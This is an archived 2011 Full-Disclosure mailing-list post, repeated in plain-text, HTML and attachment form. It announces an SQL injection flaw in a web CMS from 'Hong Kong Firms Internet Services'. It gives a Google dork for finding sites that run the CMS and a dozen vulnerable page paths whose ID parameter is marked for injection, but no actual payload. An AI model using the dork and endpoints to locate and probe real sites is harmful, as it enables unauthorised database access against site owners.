[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Hong Kong Firms Internet Services CMS Sql
From: cyber netron <cybernetron () gmail ! com>
Date: 2011-07-31 5:48:09
Message-ID: CAJttGjmUid-p9D3zaX3SG8DhHWz-6-_F3Nr9N565iZ64xCCMtw () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
.__.__ .__ __
|__| | _____ __ __| |__ _____ ____ | | __ ___________
| | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ __ \
| | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/
|__|____/__|_| /____/|___| (____ /\___ >__|_ \\___ >__|
\/ \/ \/ \/ \/ \/
.org
################################ Archieve an Resource About Hacking #####
#################### ################################################
#
# Exploit Title: Hong Kong Firms Internet Services CMS Sql Injection
Vulnerability
# Author: Netrondoank Aka netron
# home Page: http://www.ilmuhacker.org
# Forum : http://www.indonesiansecurity.info
# Vendor or Software Link: http://www.h-k.com.hk
# Version: N/A
# Category:: webapps
# Google dork: "Powered by Hong Kong Firms Internet Services"
# Tested on: Linux Back Track 5
####################################################################
# Proof Of Concept [POC]
http://site/newsdetail.php?ID=[sqli]
http://site/bespoke/events2.php?ID=[sqli]
http://site/news-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/service.php?ID=[sqli]
http://site/detail.php?ID=[sqli]
http://site/e-detail.php?ID=[sqli]
http://site/product-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/newsletterdetail.php?ID=[sqli]
http://site/servicedetail.php?ID=[sqli]
http://site/shop-detail.php?ID=[sqli]
#########################################################################################
#Greetz To:
Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com
packetstormsecurity.org, Exploit-id.com ,securityreason.com ,
securityfocus.com
##########################################################################################
############################### Archieve an Resource About
Hacking--Ilmuhackerdotorg ###########
[Attachment #5 (text/html)]
.__.__ .__ __ <br>|__| | _____ __ __| |__ \
_____ ____ | | __ ___________ <br>| | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ \
__ \<br>| | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/<br> |__|____/__|_| \
/____/|___| (____ /\___ >__|_ \\___ >__| <br> \/ \/ \/ \
\/ \/ \/ <br> \
.org<br>################################ Archieve an Resource About Hacking #####<br> \
#################### ################################################<br>#<br># Exploit Title: \
Hong Kong Firms Internet Services CMS Sql Injection Vulnerability<br># Author: Netrondoank Aka \
netron<br># home Page: <a href="http://www.ilmuhacker.org">http://www.ilmuhacker.org</a><br> # \
Forum : <a href="http://www.indonesiansecurity.info">http://www.indonesiansecurity.info</a><br># \
Vendor or Software Link: <a href="http://www.h-k.com.hk">http://www.h-k.com.hk</a><br># \
Version: N/A<br># Category:: webapps<br> # Google dork: "Powered by Hong Kong Firms \
Internet Services"<br># Tested on: Linux Back Track \
5<br><br>####################################################################<br># Proof Of \
Concept [POC]<br><br><a \
href="http://site/newsdetail.php?ID=[sqli]">http://site/newsdetail.php?ID=[sqli]</a><br> <a \
href="http://site/bespoke/events2.php?ID=[sqli]">http://site/bespoke/events2.php?ID=[sqli]</a><br><a \
href="http://site/news-detail.php?ID=[sqli]">http://site/news-detail.php?ID=[sqli]</a><br><a \
href="http://site/productdetail.php?ID=[sqli]">http://site/productdetail.php?ID=[sqli]</a><br> \
<a href="http://site/service.php?ID=[sqli]">http://site/service.php?ID=[sqli]</a><br><a \
href="http://site/detail.php?ID=[sqli]">http://site/detail.php?ID=[sqli]</a><br><a \
href="http://site/e-detail.php?ID=[sqli]">http://site/e-detail.php?ID=[sqli]</a><br> <a \
href="http://site/product-detail.php?ID=[sqli]">http://site/product-detail.php?ID=[sqli]</a><br><a \
href="http://site/productdetail.php?ID=[sqli]">http://site/productdetail.php?ID=[sqli]</a><br><a \
href="http://site/newsletterdetail.php?ID=[sqli]">http://site/newsletterdetail.php?ID=[sqli]</a><br>
<a href="http://site/servicedetail.php?ID=[sqli]">http://site/servicedetail.php?ID=[sqli]</a><br><a \
href="http://site/shop-detail.php?ID=[sqli]">http://site/shop-detail.php?ID=[sqli]</a><br><br>## \
#######################################################################################<br> \
#Greetz To:<br>Allah swt .free dom For Palestine .Indonesiansecurity.info, <a \
href="http://1337day.com">1337day.com</a><br><a \
href="http://packetstormsecurity.org">packetstormsecurity.org</a>, Exploit-id.com ,<a \
href="http://securityreason.com">securityreason.com</a> ,<a \
href="http://securityfocus.com">securityfocus.com</a><br> \
##########################################################################################<br>############################### \
Archieve an Resource About Hacking--Ilmuhackerdotorg ###########<br><br>
--001636e0a57e35553604a9570f9e--
["new poc Hong Kong Firms Internet Services CMS Sql Injection
Vulnerability.txt" (text/plain)]
.__.__ .__ __
|__| | _____ __ __| |__ _____ ____ | | __ ___________
| | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ __ \
| | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/
|__|____/__|_| /____/|___| (____ /\___ >__|_ \\___ >__|
\/ \/ \/ \/ \/ \/
.org
################################ Archieve an Resource About Hacking ###############
#################### ####################
#
# Exploit Title: Hong Kong Firms Internet Services CMS Sql Injection Vulnerability
# Author: Netrondoank Aka netron
# home Page: http://www.ilmuhacker.org
# Forum : http://www.indonesiansecurity.info
# Vendor or Software Link: http://www.h-k.com.hk
# Version: N/A
# Category:: webapps
# Google dork: "Powered by Hong Kong Firms Internet Services"
# Tested on: Linux Back Track 5
####################################################################
# Proof Of Concept [POC]
http://site/newsdetail.php?ID=[sqli]
http://site/bespoke/events2.php?ID=[sqli]
http://site/news-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/service.php?ID=[sqli]
http://site/detail.php?ID=[sqli]
http://site/e-detail.php?ID=[sqli]
http://site/product-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/newsletterdetail.php?ID=[sqli]
http://site/servicedetail.php?ID=[sqli]
http://site/shop-detail.php?ID=[sqli]
#########################################################################################
#Greetz To:
Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com
packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com
##########################################################################################
############################### Archieve an Resource About Hacking--Ilmuhackerdotorg ####
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic